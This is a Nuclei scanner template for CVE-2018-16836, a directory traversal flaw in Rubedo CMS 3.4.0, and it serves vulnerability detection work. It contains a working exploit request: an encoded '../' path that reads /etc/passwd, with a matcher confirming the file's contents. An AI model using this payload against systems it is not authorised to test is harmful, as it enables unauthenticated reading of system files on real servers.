nuclei-templates/cves/2018/CVE-2018-16836.yaml

30 lines
985 B
YAML

id: CVE-2018-16836
info:
name: Rubedo CMS 3.4.0 - Directory Traversal
author: 0x_Akoko
severity: critical
reference: https://www.exploit-db.com/exploits/45385
tags: cve,cve2018,rubedo,lfi
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-16836
cwe-id: CWE-22
description: "Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI."
requests:
- method: GET
path:
- "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200